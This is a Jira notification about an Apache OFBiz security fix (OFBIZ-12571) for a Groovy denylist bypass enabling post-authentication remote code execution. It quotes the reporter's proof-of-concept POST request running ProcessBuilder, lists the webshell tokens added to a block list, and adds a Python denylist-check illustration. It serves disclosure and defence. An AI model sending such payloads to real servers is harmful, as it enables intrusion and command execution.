[ 
https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490809#comment-17490809
 ] 

ASF subversion and git services commented on OFBIZ-12571:
---------------------------------------------------------

Commit 28092f2a7568634c1dd9c6c70f3656f13ca7a431 in ofbiz-framework's branch 
refs/heads/trunk from Jacques Le Roux
[ https://gitbox.apache.org/repos/asf?p=ofbiz-framework.git;h=28092f2 ]

Fixed: Groovy denied list bypass causes post-auth RCE from 
webtools/control/ProgramExport (OFBIZ-12571)

The 1st issue was due to the use of the processbuilder token. It has been added to
deniedWebShellTokens in security.properties by commit f2cf262 for OFBIZ-11948.
The tokens function (for js) and class have been added since, while browsing
https://github.com/tennc/webshell

As mentioned in the related deniedWebShellTokens TODO comment: "TODO.... to be
continued
with known webshell contents... a complete allow list is impossible anyway..."

So, later a deeper review of Groovy sandbox possibilities will be done.

Thanks to Y4er for the report


> Groovy denied list bypass causes post-auth RCE from 
> webtools/control/ProgramExport
> ----------------------------------------------------------------------------------
>
>                 Key: OFBIZ-12571
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
>             Project: OFBiz
>          Issue Type: Bug
>          Components: framework/webtools
>    Affects Versions: 18.12.05
>         Environment: ofbiz 18.12.05
>            Reporter: Y4er
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.06, 22.01.01
>
>         Attachments: image-2022-02-10-17-50-58-914.png
>
>
> Groovy blacklist bypass causes post-auth RCE from 
> webtools/control/ProgramExport
>
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
>
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29
> {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!
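Added here as an illustration, not code from the commit or from OFBiz itself: a simplified model of the deniedWebShellTokens check run over the request in the report, to show which token the fix relies on. DENIED_TOKENS is a constructed subset holding only the three tokens the comment names, and the case-insensitive substring match is an assumption about how such a list is applied, not OFBiz's implementation.

```python
from urllib.parse import parse_qs

# Constructed subset of deniedWebShellTokens. The real list in OFBiz's
# security.properties is longer; these three are the ones the comment names.
DENIED_TOKENS = ("processbuilder", "function", "class")

# The request from the issue report, rebuilt as a raw HTTP message
# (cookie header omitted; the body is the one from the report).
SAMPLE_REQUEST = (
    "POST /webtools/control/ProgramExport HTTP/1.1\r\n"
    "Host: 192.168.1.178:8443\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 68\r\n"
    "\r\n"
    "groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29"
)


def extract_groovy_program(raw_request):
    """Return the URL-decoded groovyProgram field of a form POST, or None."""
    head, sep, body = raw_request.partition("\r\n\r\n")
    if not sep:
        return None
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    ctype = headers.get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return None
    values = parse_qs(body, keep_blank_values=True).get("groovyProgram")
    return values[0] if values else None


def denied_tokens_in(program):
    """Case-insensitive substring scan (assumed matching rule, see lead-in)."""
    lowered = program.lower()
    return [token for token in DENIED_TOKENS if token in lowered]


def check_request(raw_request):
    """Return (decoded program, matched tokens); no matches means the list lets it through."""
    program = extract_groovy_program(raw_request)
    if program is None:
        return None, []
    return program, denied_tokens_in(program)


if __name__ == "__main__":
    print(check_request(SAMPLE_REQUEST))
```

Note that the submitted program spells `ProcessBuilder` with capitals while the token is lower-case, so a case-sensitive comparison would miss it; the comment's own TODO says why a denylist like this can only ever be partial.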



--
This message was sent by Atlassian Jira
(v8.20.1#820001)